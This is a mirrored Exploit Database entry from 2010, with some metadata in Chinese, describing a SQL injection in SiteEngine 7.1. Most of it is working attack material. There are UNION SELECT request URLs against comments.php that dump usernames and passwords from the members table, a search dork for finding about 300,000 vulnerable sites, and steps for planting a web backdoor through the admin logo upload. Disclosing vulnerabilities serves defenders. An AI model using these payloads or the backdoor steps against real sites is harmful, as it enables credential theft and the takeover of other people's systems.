SiteEngine 7.1 – SQL Injection

• Exploit Database
• 10 阅读

• 作者： Beach
  日期： 2010-11-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15612/

• #################################################################################
  #Title: SiteEngine 7.1 SQL injection Vulnerability
  #Date:2010-11-25
  #Author:Beach
  #Team:www.linux520.com
  #Vendor:www.siteengine.netwww.boka.cn
  #Dork:"Powered by SiteEngine" //300,000 +~
  #Language:PHP
  #Greetz:birdarmy
  #################################################################################
  [*]Description:
   Exploit this vulnerability comment must be enabled (default == enable)
  #################################################################################
  [*]Exploit:
  
  Enterprise Portal Version:
  [1]http://server/comments.php?id=1&module=newstopic+m,boka_newstopicclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,...,38,39+from+boka_members%23
  
  [2]http://server/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,...,26,27+from+boka_members%23
  
  maybe have a different number of columns , you can try it ...
  ==================================================================================
  E-commerce Version:
  
  [+]http://server/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,password,4,5,6,...,37,38+from+boka_members%23
  ##################################################################################
  
  Similar to other versions=)
  ##################################################################################
  [*]Upload backdoor:
  Administrator Panel: http://server/admin/
  
  System maintainance -> WAP Setting -> plz upload WAP logo(<= 10kb) -> OK -> 
  Browse Right Now -> view properties [the URL is Ur backdoor]
  ##################################################################################